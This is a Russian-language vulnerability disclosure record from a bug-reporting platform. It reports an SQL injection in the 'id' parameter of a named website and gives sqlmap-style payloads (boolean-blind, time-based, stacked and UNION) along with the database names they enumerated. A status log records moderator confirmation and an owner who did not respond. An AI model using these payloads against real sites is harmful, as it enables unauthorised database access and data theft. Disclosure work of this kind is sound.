Подробная информация
Есть SQL инъекции на сайте.
Используя эту слабость возможно краст конфиденциальной информации с сайта (пароли, структура сайта и т.д.)
site: ambiancemed.com
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=7 AND 9525=9525
Type: stacked queries
Title: MySQL > 5.0.11 stacked queries (comment)
Payload: id=7;SELECT SLEEP(5)#
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=7 AND SLEEP(5)
Type: UNION query
Title: Generic UNION query (NULL) - 8 columns
Payload: id=-6345 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x717a767071,0x68644a6f727a6a4f624959496e595a767646416e6f47615864685351415061656f6f784d55455870,0x716b626271),NULL,NULL-- lBeb
---
available databases [2]:
[*] apteyfpx_amqiance
[*] information_wchema
Записи
-
23 Январь 2017, 13:14
Статус уязвимости
Нет ответа от источника -
13 Декабрь 2016, 12:04
Статус уязвимости
Отправлено сообщение об уязвимости на электронный адрес источника -
13 Декабрь 2016, 11:15
Статус уязвимости
Подтверждено со стороны модератора -
13 Декабрь 2016, 11:01
Статус уязвимости
Отправлено сообщение об уязвимости на электронный адрес источника -
11 Декабрь 2016, 11:22
Уязвимости присвоен балл
Модератор присвоил 8 баллов из 10-и на уязвимости -
11 Декабрь 2016, 11:10
Статус уязвимости
Подтверждено со стороны модератора -
08 Декабрь 2016, 16:25
Уязвимость изменена
Уязвимость изменена -
08 Декабрь 2016, 12:17
Уязвимость отказана
Saytın ünvanını qeyd edin -
07 Декабрь 2016, 23:18
Добавлена уязвимость
Добавлена уязвимость на BUGemot